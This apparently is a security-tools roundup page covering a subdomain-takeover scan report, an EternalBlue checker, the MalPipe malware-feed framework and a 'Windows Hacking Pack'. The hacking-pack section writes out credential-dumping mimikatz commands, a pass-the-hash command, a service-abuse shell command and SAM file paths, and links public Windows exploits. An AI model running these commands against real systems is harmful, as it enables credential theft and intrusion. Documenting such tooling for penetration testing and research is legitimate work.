[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
[-] Total Unique Subdomains Found: 3
blog.0daylabs.com
www.0daylabs.com
test.0daylabs.com

[+] Verifying Subdomains and takeover options

[+] Possible subdomain takeovers (Manual verification required):

test.0daylabs.com

[i] Verified and Analyzed Subdomains:

[i] URL: blog.0daylabs.com
[i] Wappalyzer: [u'jQuery', u'Varnish', u'Font Awesome', u'Twitter Bootstrap', u'Google Analytics', u'Google Font API', u'Disqus', u'Google AdSense']

[i] Scraper Results

[+] Shodan
Hostname: test.0daylabs.com IP: 139.59.63.111 Ports: 179
Hostname: test.0daylabs.com IP: 139.59.63.111 Ports: 179

[+] Twitter
URL: https://twitter.com/tweetrpersonal9/status/832624003751694340 search string: 0daylabs
URL: https://twitter.com/ratokeshi/status/823957535564644355 search string: 0daylabs

Notifications

Configuring Slack:
RTA can also do push notifications to slack which includes the main scan highlight along with Nessus and other integrated scanner reports divided on the basis of severity.
  • In your slack, create an incoming webhook and point it to the channel where you need the RTA to send the report. You can read more about creating incoming webhooks on slack documentation.
  • In the config file, update the URL in the slack section with full URL (including https://) for the incoming webhook.
Once Slack is configured, you will automatically start getting reports on your configured Slack channel.

Roadmap
Here are a couple of ideas which we have in mind for RTA going ahead. If you have any ideas/feature requests that are not listed below, feel free to raise an issue on GitHub.
  • Email the results once the scan is completed.
  • Extend the current RTA API so that we can launch custom scans with required options via the API.
  • Launch custom scans based on Wappalyzer results (eg: wpscan if wordpress is detected)
  • Investigate and integrate more web security scanners including but not limited to Arachni, Wapiti, Skipfish and others !
  • JSON/XML output formatting for the RTA scan result.
  • Improving the logic for Subdomain takeover.
  • Multi-threading support for faster scan completion.

Contributors
Awesome people who built this project:

Lead Developers:
Anirudh Anand (@a0xnirudh)

Project Contributors:
Mohan KK (@MohanKallepalli)
Ankur Bhargava (@_AnkurB)
Prajal Kulkarni (@prajalkulkarni)
Himanshu Kumar Das (@mehimansu)

Special Thanks
Sublist3r


Eternal Check - Ip Vulnerability Check To Eternal Blue, Romance, Synergy & Champion


IP vulnerability check for Eternal Blue, Romance, Synergy & Champion:

Eternal Check
  • Eternal Check verifies whether an IP is vulnerable to the SMB vulnerabilities:
  • Eternal Blue
  • Eternal Romance
  • Eternal Champion
  • Eternal Synergy

Screenshots



Eternal Check Running (Video)


Requirements
  • nmap
  • winbind
  • wine32
  • wget
  • Additional info on how to install 32-bit wine on a 64-bit machine: https://wiki.debian.org/Wine

Usage
  • example 1 : ./echeck
  • example 2 : ./echeck 192.68.2.56

Important
  • Do not expect much support or any at all

Last Notes (References of these vulnerabilities)


WHP - Microsoft Windows Hacking Pack

M$ Windows Hacking Pack
===========

Tools here are from different sources. The repo is generally licensed under the WTFPL, but some content may not be (e.g. Sysinternals).
"pes" means "PE Scrambled". It's useful sometimes.


Remote Exploits
===========

Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp


Windows XP/NT (before SP2)
MS03-026 Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit


Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvsvc)
https://www.exploit-db.com/exploits/7104/


Windows 7 and Server 2008 R2 (x64), all Service Packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010


Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8



Privilege Escalation
===========

First, if you have meterpreter, it may be a good idea to try "getsystem".


srvcheck3.exe
=====
Privilege escalation for Windows XP SP2 and before
This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"


KiTrap0D.tar
=====
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/


Other ways of exploits listed
=====
Windows XP/2003
MS11-080 → Local Privilege Escalation Exploit Afd.sys
https://www.exploit-db.com/exploits/18176/


Windows Vista/7
CVE-2010-4398 Elevation of Privileges (UAC Bypass)
http://www.securityfocus.com/bid/45045/exploit


Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/


Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/


Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/


Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM

Windows XP SP2 (and before)
srvcheck3.exe - upnp service or SSDPSRV service


Windows NT/2K/XP/2K3/Vista/2K8/7/8
KiTrap0D - EPATHOBJ Local Ring Exploit
https://www.exploit-db.com/exploits/11199/


Windows XP (and after)
.lnk exploit for receiving NetNTLM hashes remotely.
https://www.youtube.com/watch?v=cuF_Ibo-mmM


Backup files that may contain the SAM
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel
Otherwise just copy.


Dump SAM through shadow volume
If a shadow copy can be created, the database can be copied from it.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow


Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).


Mimikatz dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam


Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)


SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."


Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/


LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip


PassTheHash (before Windows 8.1)
pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd


PassTheTicket (Kerberos)
mimikatz can do it


Duplicate Access Tokens (if an admin access token can be used, it's a win)
http://sourceforge.net/projects/incognito/


Token "Kidnapping"
MS09-012, Churrasco.bin shell.bin (runs shell.bin with NT AUTHORITY\SYSTEM privileges)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html


Other notable tools
psexec, smbshell, metasploit's psexec, etc.
https://github.com/BloodHoundAD/BloodHound - Visualizes relationships in an AD domain and finds short escalation paths.



To Be Added
===========
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade



Hashes (SHA256) and VirusTotal scans
===========

8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333 AwesomerShell.tar
7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051 KiTrap0D.tar
96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389 LICENSE.txt
b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e ncat.exe
da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b ncat_pes.exe
be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b nc.exe
56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7 nmap-7.12-setup-gui.exe
0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5 nmap-7.12-win32_commandline.zip
976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654 plink.exe
952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f srvcheck3.exe
ca5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170 PEScrambler.exe
ef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9 SysinternalsSuite.zip
8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336 windows-privesc-check.exe
6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd windows-privesc-check.py
ffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9 fgdump.exe
c36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a kaht2.zip
2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d mimikatz_2-1.zip
0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a ms08-067_exploit_31874.py
cc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827 ms08-067_exploit_7132.py
950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e Responder.tar
54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448 samdump2.exe
ece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8 wce_getlsasrvaddr.exe
c6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7 wce_v1_41beta_universal.exe
ecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6 wce_v1_42beta_x32.exe

5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 sources/nc110.tgz
47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 sources/rdp2tcp-0.1.tar.gz
33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78 sources/srvcheck3.zip
f706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56 sources/3proxy-0.8.6.tar.gz
7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc sources/3proxy-0.9-devel.tgz
dec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81 sources/fgdump-2.1.0.tar.bz2
352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca sources/impacket_0-9-15.tar
21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4 sources/keimpx-0.3-dev.tar
16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd sources/mimikatz-2016-06.zip
602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526 sources/samdump2-3.0.0.tar.bz2


ncat.exe
SHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e
https://virustotal.com/en/file/b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e/analysis/1466258994/

ncat_pes.exe
SHA256: da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b
https://virustotal.com/en/file/da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b/analysis/1466259528/

nc110.tgz
SHA256: 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976
https://virustotal.com/en/file/5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976/analysis/1466258410/

rdp2tcp-0.1.tar.gz
SHA256: 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9
https://virustotal.com/en/file/47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9/analysis/1466271163/
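The hash list above is only useful if someone actually checks a downloaded drop against it before trusting or running anything in it. The following is an added example (not code from the WHP repository) that parses a manifest in the same "<sha256> <path>" shape, hashes the files under a directory, and reports mismatches, listed-but-missing files and unlisted extras. The sample files, their contents and the deliberately wrong digests are constructed for the demo; none of the digests are taken from the page.

```python
"""Verify a downloaded tool drop against a SHA256 manifest.

Added example, not code from the WHP repository. The manifest format is the
one shown above: one "<sha256> <path>" pair per line.
"""
import hashlib
import os
import tempfile

HEX_DIGITS = set("0123456789abcdef")

# Constructed sample files; their digests are computed below, not copied from the page.
SAMPLE_FILES = {
    "nc.exe": b"constructed sample content standing in for nc.exe\n",
    "sources/nc110.tgz": b"constructed sample content standing in for nc110.tgz\n",
    "plink.exe": b"constructed sample content standing in for plink.exe\n",
}


def parse_manifest(text):
    """Return {relative_path: sha256_hex} from manifest text; reject malformed lines."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError("manifest line %d: expected '<sha256> <path>'" % lineno)
        digest, path = parts[0].lower(), parts[1].strip()
        if len(digest) != 64 or set(digest) - HEX_DIGITS:
            raise ValueError("manifest line %d: not a SHA256 hex digest" % lineno)
        entries[path] = digest
    return entries


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large archives do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify_tree(root, manifest):
    """Compare every file under root with the manifest.

    Returns sorted lists: ok, mismatch (digest differs), missing (listed but
    absent) and unlisted (present on disk but not in the manifest).
    """
    results = {"ok": [], "mismatch": [], "missing": [], "unlisted": []}
    for rel, expected in manifest.items():
        full = os.path.join(root, *rel.split("/"))
        if not os.path.isfile(full):
            results["missing"].append(rel)
        elif sha256_file(full) == expected:
            results["ok"].append(rel)
        else:
            results["mismatch"].append(rel)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel not in manifest:
                results["unlisted"].append(rel)
    return {key: sorted(value) for key, value in results.items()}


def build_demo_manifest():
    """Manifest for the constructed tree: two correct entries, one wrong digest, one missing file."""
    lines = [
        "%s %s" % (hashlib.sha256(SAMPLE_FILES[name]).hexdigest(), name)
        for name in ("nc.exe", "sources/nc110.tgz")
    ]
    lines.append("0" * 64 + " plink.exe")      # deliberately wrong digest
    lines.append("1" * 64 + " KiTrap0D.tar")   # listed but never written to disk
    return "\n".join(lines) + "\n"


def run_demo():
    """Write the constructed tree to a temp dir and verify it against the manifest."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in SAMPLE_FILES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        with open(os.path.join(root, "extra.dll"), "wb") as fh:
            fh.write(b"constructed file that the manifest does not mention\n")
        return verify_tree(root, parse_manifest(build_demo_manifest()))


if __name__ == "__main__":
    for category, paths in run_demo().items():
        print("%-9s %s" % (category, ", ".join(paths) or "-"))
```

Unlisted files are reported on purpose: a drop that carries files the manifest never mentioned deserves the same scrutiny as one whose digests do not match.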


MalPipe - Malware/IOC Ingestion And Processing Engine

$
0
0

MalPipe is a modular malware (and indicator) collection and processing framework. It is designed to pull malware, domains, URLs and IP addresses from multiple feeds, enrich the collected data and export the results.
At this time, the following feeds are supported:

Getting Started
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.

Installing
Deployment of MalPipe requires installing the required python libraries and configuring the various modules.
Python dependencies can be installed by running:
pip install -r requirements.txt

Configuring

Feeds
An example configuration is provided in config_example.json with settings to get started. This file contains a JSON object with the required settings for each feed, processor and exporter. A description of a feed's settings is shown below:
...
"feeds": {
    ...
    "MalShare": {
        "ENABLED" : true,
        "API_KEY" : "00000000000000000000000000000000000000000000000000000000000",
        "EXPORTERS" : ["DetailsPrinter", "JSONLog"],
        "PROCESSORS" : ["YaraScan", "DNSResolver"]
    },
    ...
As some feeds update daily, feeds can take two forms: scheduled and active. When each should run is defined in the individual modules, not in the configuration file.

Processors
Processors are used to enrich or standardize the collected data. For example, data from VirusTotal contains YARA results for each file collected, whereas MalShare does not. By adding YaraScan to the PROCESSORS key, you can scan the files so that they include this data too.
An example module's settings are below:
...
"processors": {
    ...
    "YaraScan": {
        "ENABLED" : false,
        "RULES_PATH": "/yara_rules/Malware.yara"
    },
    ...
Currently, the following processors have been implemented:
  • ASNLookup
  • DNSResolver
  • FileType
  • RDNS
  • YaraScan

Exporters
The final component is exporters; these control where the data goes. They can be used to export collected data to a malware repository, a SIEM or JSON log files, or to print it for the user.
...
"exporters": {
    ...
    "JSONLog": {
        "ENABLED" : true,
        "PRETTY" : true,
        "LOG_PATH": "./temp/"
    },
    ...
Currently, the following exporters have been implemented:
  • DetailsPrinter
  • GenericWebStorage
  • JSONLog
  • LocalFileStorage

Running
After setup, MalPipe can be run by using:
python malpipe.py

Developing Modules
Modules for MalPipe are located under malpipe/, grouped by type.
Creating a new module is easy:

Create Python Module
MalPipe modules are defined as Python classes. The following is an example module header:
class ModuleName(Processor):
    def __init__(self):
        md = ProcessorDescription(
            module_name="ModuleName",
            description="Description",
            authors=["Author Name"],
            version="VersionNumber"
        )
        Processor.__init__(self, md)
        self.types = ['ipaddresses']
        self.parse_settings()
Settings can be read by importing the configuration and assigning them to class variables, as shown below:
from malpipe.config import CONFIG
...
self.yara_rule_path = CONFIG['processors'][self.get_module_name()]['RULES_PATH']
Each processor is required to have a run function that is called by the feed.

Add Settings
After creating the module, its settings need to be added to your config.json under the processors, feeds, or exporters key. If the new module is a processor or exporter, it will also need to be added to the associated feeds. An example is shown below:
...
"processors": {
    ...
    "SuperNewModule": {
        "ENABLED" : true,
        "DOCOOLSTUFF": true
    },
    ...
"feeds": {
    ...
    "0DayMalwareFeed": {
        "ENABLED" : true,
        "EXPORTERS" : ["DetailsPrinter", "JSONLog"],
        "PROCESSORS" : ["SuperNewModule"]
    }
    ...
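A feed that names a processor or exporter which was never added to the config, or which is still disabled, is the easiest mistake to make in the Feeds / Processors / Exporters setup above and in the "Add Settings" step. The following is an added example (not part of MalPipe) that loads a config in the documented shape and reports every such dangling or disabled reference before the pipeline is started. The config text is constructed for the demo: the module names mirror the README's examples, the API key is a placeholder, and the validation rules are assumptions of mine rather than anything MalPipe itself enforces.

```python
"""Sanity-check a MalPipe-style config.json before running the pipeline.

Added example, not part of MalPipe. It relies only on the config layout
documented above (feeds / processors / exporters, each entry carrying ENABLED,
feeds carrying EXPORTERS and PROCESSORS lists); the validation rules are assumed.
"""
import json

# Constructed config in the documented shape. Module names mirror the README
# examples; API_KEY is a placeholder. SuperNewModule is referenced by a feed
# but has not yet been added under "processors", which is exactly the mistake
# the "Add Settings" step warns about.
EXAMPLE_CONFIG_JSON = """
{
  "feeds": {
    "MalShare": {
      "ENABLED": true,
      "API_KEY": "PLACEHOLDER_API_KEY",
      "EXPORTERS": ["DetailsPrinter", "JSONLog"],
      "PROCESSORS": ["YaraScan", "DNSResolver"]
    },
    "0DayMalwareFeed": {
      "ENABLED": true,
      "EXPORTERS": ["JSONLog"],
      "PROCESSORS": ["SuperNewModule"]
    },
    "DisabledFeed": {
      "ENABLED": false,
      "EXPORTERS": ["NoSuchExporter"],
      "PROCESSORS": []
    }
  },
  "processors": {
    "YaraScan": {"ENABLED": false, "RULES_PATH": "/yara_rules/Malware.yara"},
    "DNSResolver": {"ENABLED": true}
  },
  "exporters": {
    "JSONLog": {"ENABLED": true, "PRETTY": true, "LOG_PATH": "./temp/"},
    "DetailsPrinter": {"ENABLED": true}
  }
}
"""

SECTIONS = ("feeds", "processors", "exporters")
FEED_REFERENCES = (("PROCESSORS", "processors"), ("EXPORTERS", "exporters"))


def load_config(text):
    return json.loads(text)


def validate_config(config):
    """Return a list of problem strings; an empty list means the config is consistent."""
    problems = []
    for section in SECTIONS:
        if not isinstance(config.get(section), dict):
            problems.append("missing or non-object top-level section '%s'" % section)
            continue
        for name, settings in config[section].items():
            if not isinstance(settings, dict) or not isinstance(settings.get("ENABLED"), bool):
                problems.append("%s/%s: ENABLED must be true or false" % (section, name))
    if any(not isinstance(config.get(s), dict) for s in SECTIONS):
        return problems  # cross-references cannot be checked without all three sections
    for feed, settings in config["feeds"].items():
        if not isinstance(settings, dict) or not settings.get("ENABLED"):
            continue  # disabled feeds are never scheduled, so their references are not checked
        for key, section in FEED_REFERENCES:
            for module in settings.get(key, []):
                target = config[section].get(module)
                if target is None:
                    problems.append("feeds/%s: %s references '%s', which has no entry under '%s'"
                                    % (feed, key, module, section))
                elif not target.get("ENABLED"):
                    problems.append("feeds/%s: %s references '%s', which is disabled"
                                    % (feed, key, module))
    return problems


def register_module(config, section, name, settings):
    """Add (or replace) a module entry: the config-side half of the 'Add Settings' step."""
    if section not in SECTIONS:
        raise ValueError("unknown section %r" % section)
    config.setdefault(section, {})[name] = dict(settings)
    return config


def run_demo():
    """Validate the constructed config, apply the two fixes it needs, validate again."""
    config = load_config(EXAMPLE_CONFIG_JSON)
    before = validate_config(config)
    register_module(config, "processors", "SuperNewModule", {"ENABLED": True, "DOCOOLSTUFF": True})
    config["processors"]["YaraScan"]["ENABLED"] = True
    after = validate_config(config)
    return before, after


if __name__ == "__main__":
    before, after = run_demo()
    print("problems before fixing:")
    for problem in before:
        print("  -", problem)
    print("problems after fixing: %d" % len(after))
```

Disabled feeds are skipped deliberately: a half-configured feed that is switched off should not block the rest of the pipeline from starting, whereas an enabled feed pointing at a missing module would fail only once that feed is scheduled.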

Contributing
Please report any problems by creating an issue or opening a pull request. If you have additional modules or features you would like to see, please consider opening an issue.

Authors
See also the list of contributors who participated in this project.


